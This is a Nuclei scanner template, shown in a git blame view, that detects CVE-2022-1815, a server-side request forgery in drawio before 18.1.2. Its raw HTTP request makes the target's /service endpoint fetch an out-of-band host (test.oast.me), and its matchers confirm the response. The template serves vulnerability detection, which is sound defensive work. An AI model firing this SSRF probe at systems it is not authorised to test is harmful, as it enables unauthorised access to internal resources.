nuclei-templates/cves/2022/CVE-2022-1815.yaml

28 lines
774 B
YAML
Raw Normal View History

2022-07-29 12:55:26 +00:00
id: CVE-2022-1815
info:
2022-07-29 15:40:00 +00:00
name: Drawio < 18.1.2 - Server Side Request Forgery
2022-07-29 12:55:26 +00:00
author: amit-jd
severity: medium
2022-07-29 14:05:15 +00:00
description: |
2022-07-29 14:07:09 +00:00
SSRF in /service endpoint in jgraph/drawio prior to 18.1.2. Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2.
2022-07-29 12:55:26 +00:00
reference:
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/
2022-07-29 14:05:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1815
2022-07-29 14:28:11 +00:00
metadata:
verified: true
2022-07-29 15:40:00 +00:00
tags: cve,cve2022,drawio,ssrf,oast,oss,jgraph
2022-07-29 12:55:26 +00:00
requests:
- raw:
- |
2022-07-29 15:40:00 +00:00
GET /service/0/test.oast.me HTTP/2
2022-07-29 12:55:26 +00:00
Host: {{Hostname}}
matchers:
2022-07-29 15:40:00 +00:00
- type: dsl
dsl:
- "contains(body, 'Interactsh Server')"
- status_code == 200
condition: and